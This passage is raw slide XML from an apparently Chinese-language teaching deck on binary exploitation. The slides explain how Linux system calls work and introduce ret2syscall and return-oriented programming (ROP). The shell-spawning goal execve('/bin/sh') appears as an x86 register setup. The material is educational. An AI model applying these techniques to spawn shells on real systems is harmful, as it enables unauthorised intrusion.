              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26DE6005-05DC-4A14-9ED1-089CABF818B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088700" y="3532117"/>
            <a:ext cx="2670924" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>举例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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5F43FCBD-5841-4354-92CA-E1BC6CDB204B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1621003" y="4184471"/>
            <a:ext cx="9085885" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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my_puts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>() -&gt; write() -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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my_puts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(“Hello world!”);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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程序 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中的用户代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>		</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write(1, &amp;”Hello world!”, 12);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>libc</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中的用户代码</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = 4; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = 1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = &amp;”Hello world!”; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = 12; ] + int 0x80; =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>内核中的内核代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BABA1564-7487-44BF-937B-A7C8E2C4412B}"/>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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10634227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817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9360013-6EB5-4ED1-B251-B05527C21559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631204" y="2231780"/>
            <a:ext cx="5235900" cy="3033783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可是在程序中没有已存在的一段代码是：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>	mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, 0xb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>	mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, [“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>”] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>	mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>	mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>	int 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>	=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>",NULL,NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>我们仍然要执行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>",NULL,NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>该怎么做呢？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A54133-4A71-41CF-9D5D-ECBB04E00DA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1642068"/>
            <a:ext cx="2061028" cy="589712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E73E88F5-2219-4A18-B3D0-F0035F80B09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867104" y="2536581"/>
            <a:ext cx="6455396" cy="2200520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eturn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>riented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rogramming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="华文隶书" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文隶书" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>返回导向编程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="华文隶书" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文隶书" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 817">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBB5AD43-7E1E-440B-845D-C88AE4C56A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289463" y="1642068"/>
            <a:ext cx="2061028" cy="589712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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9E34DED4-AB12-4048-9CBD-9F44C9BEBFD1}"/>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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3946415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CE41E75-CADB-432F-BD9B-68BB2E8535DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="3011884"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0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E9B83B2B-3040-4AB1-B910-66DF6FEBA992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="3405584"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0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F471B465-21BE-4265-88CF-A20EC117EDD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="3799284"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE0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8330787A-EBE9-44B1-97D1-4C5D4F13ACFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="4192984"/>
            <a:ext cx="2670924" cy="393700"/>
          </a:xfrm>
